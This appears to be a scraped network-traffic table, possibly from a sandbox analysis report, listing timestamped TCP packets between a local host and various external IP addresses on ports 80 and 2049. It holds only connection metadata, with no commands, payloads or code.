                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.476537943 CET805961854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.482188940 CET5961880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.487740040 CET805961854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.487807989 CET5961880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.694000959 CET805961118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.694740057 CET5961180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.700445890 CET805961118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.700553894 CET5961180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.732654095 CET5962480192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.737582922 CET8059624172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.741106987 CET5962480192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.741274118 CET5962480192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.741306067 CET5962480192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.745995998 CET8059624172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.746015072 CET8059624172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.796947956 CET5955680192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.797708988 CET5962580192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.802396059 CET8059556208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.802483082 CET5955680192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.802494049 CET8059625208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.802663088 CET5962580192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.805493116 CET5962580192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.805493116 CET5962580192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.810364008 CET8059625208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.810391903 CET8059625208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.411519051 CET8059624172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.411596060 CET5962480192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.411645889 CET5962480192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.416766882 CET8059624172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.437397003 CET5963180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.440380096 CET8059625208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.442629099 CET8059631172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.446860075 CET5963180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.447076082 CET5963180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.447289944 CET5963180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.452191114 CET8059631172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.453023911 CET8059631172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.481801987 CET5962580192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.483686924 CET5962580192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.483686924 CET5962580192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.488558054 CET8059625208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.488589048 CET8059625208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.631006002 CET8059625208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.684541941 CET5962580192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.033071995 CET5963280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.038085938 CET805963234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.038254023 CET5963280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.038399935 CET5963280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.038399935 CET5963280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.043472052 CET805963234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.043540955 CET805963234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.113977909 CET8059631172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.114054918 CET5963180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.114115000 CET5963180192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.118982077 CET8059631172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.332839012 CET5963780192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.337696075 CET805963734.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.337785006 CET5963780192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.337990999 CET5963780192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.338012934 CET5963780192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.343410969 CET805963734.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.343449116 CET805963734.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.873228073 CET805963234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.875267029 CET5963280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.881484032 CET805963234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.881546021 CET5963280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.185008049 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.190051079 CET805964354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.190145969 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.190515995 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.190584898 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.195301056 CET805964354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.195446014 CET805964354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.342601061 CET805963734.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.342832088 CET5963780192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.348006964 CET805963734.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.348112106 CET5963780192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.466406107 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.471366882 CET805964618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.471452951 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.471607924 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.471630096 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.476438999 CET805964618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.477212906 CET805964618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.028856993 CET805964354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.029908895 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.035600901 CET805964354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.035669088 CET5964380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.134263039 CET805964618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.134617090 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.139859915 CET805964618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.143109083 CET5964680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.181180000 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.186001062 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.189193010 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.189733982 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.189766884 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.194567919 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.194629908 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.532799006 CET5965380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.537779093 CET805965318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.537861109 CET5965380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.538019896 CET5965380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.538038969 CET5965380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.543587923 CET805965318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.543610096 CET805965318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.824763060 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.858416080 CET596542049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.863344908 CET204959654212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.863440990 CET596542049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.863703966 CET596542049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.864799023 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.864799023 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.868578911 CET204959654212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.869671106 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.869678020 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.011395931 CET8059652208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.059551001 CET5965280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.071643114 CET5966080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.076437950 CET805966013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.076497078 CET5966080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.076834917 CET5966080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.076880932 CET5966080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.081609964 CET805966013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.081685066 CET805966013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.356498003 CET204959654212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.356874943 CET596542049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.357126951 CET596542049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.979379892 CET805965318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.980443954 CET5965380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.986033916 CET805965318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.986095905 CET5965380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.206655979 CET5966680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.211782932 CET805966618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.211925030 CET5966680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.212300062 CET5966680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.212440968 CET5966680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.217578888 CET805966618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.217706919 CET805966618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.502327919 CET805966013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.502523899 CET5966080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.508008957 CET805966013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.511147976 CET5966080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.547730923 CET5966780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.553338051 CET805966744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.553462982 CET5966780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.553659916 CET5966780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.553705931 CET5966780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.558476925 CET805966744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.558608055 CET805966744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.869647980 CET805966618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.871046066 CET5966680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.876718044 CET805966618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.876774073 CET5966680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.107233047 CET5967380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.112023115 CET805967344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.112106085 CET5967380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.112466097 CET5967380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.112466097 CET5967380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.117350101 CET805967344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.117362022 CET805967344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.208004951 CET805966744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.208182096 CET5966780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.213516951 CET805966744.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.213952065 CET5966780192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.248589039 CET5967480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.253449917 CET805967454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.253520012 CET5967480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.253659010 CET5967480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.253686905 CET5967480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.258562088 CET805967454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.258651972 CET805967454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.765846014 CET805967344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.766212940 CET5967380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.771400928 CET805967344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.771456957 CET5967380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.999880075 CET5968080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.004703999 CET805968018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.004770041 CET5968080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.004925966 CET5968080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.004947901 CET5968080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.009810925 CET805968018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.009908915 CET805968018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.098514080 CET805967454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.098937035 CET5967480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.104373932 CET805967454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.105082989 CET5967480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.132705927 CET5968180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.137644053 CET805968135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.141182899 CET5968180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.141329050 CET5968180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.141366959 CET5968180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.146177053 CET805968135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.146189928 CET805968135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.959660053 CET805968135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.959924936 CET5968180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.965477943 CET805968135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.965565920 CET5968180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.005260944 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010364056 CET80596873.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010446072 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010684013 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010766983 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.016083002 CET80596873.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.016093969 CET80596873.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.453851938 CET805968018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.454044104 CET5968080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.459480047 CET805968018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.459544897 CET5968080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.691274881 CET80596873.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.691459894 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.691715956 CET5969180192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.697954893 CET805969118.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.698049068 CET5969180192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.698206902 CET5969180192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.698240042 CET5969180192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.722784042 CET80596873.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.722842932 CET5968780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.724448919 CET805969118.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.724459887 CET805969118.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.749089956 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.754157066 CET8059693165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.754287004 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.760854006 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.760989904 CET5969380192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.765888929 CET8059693165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.766243935 CET8059693165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.374037027 CET596952049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.378927946 CET204959695212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.379019022 CET596952049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.379300117 CET596952049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.384139061 CET204959695212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.549619913 CET805969118.246.231.120192.168.2.5
